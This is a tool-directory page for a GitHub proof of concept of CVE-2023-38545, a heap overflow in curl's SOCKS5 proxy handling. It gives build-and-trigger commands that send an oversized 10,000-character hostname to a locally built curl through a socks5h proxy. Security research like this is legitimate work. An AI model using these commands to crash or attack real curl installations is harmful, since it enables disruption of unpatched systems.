Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/imfht/cve-2023-38545
Vulnerability AnalysisExploitationPapers & ResearchLearning & EducationBinary Exploitation
GitHubimfht/cve-2023-38545

CVE-2023-38545

😄 CVE-2023-38545堆溢出的POC和分析文章

View Repository
812 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

usage

root@kitploit:~
git clone https://github.com/imfht/CVE-2023-38545
cd CVE-2023-38545/curl-7.74.0 && ./configure --with-openssl
make -j 4
python3 socks.py &
export ALL_PROXY=socks5h://127.0.0.1:9050
./curl-7.74.0/src/curl  $(python3 -c "print(('A'*10000), end='')") -vvvv

proof

image-20231012151015503 image

for details please see: this link(in chinese)

Download Tool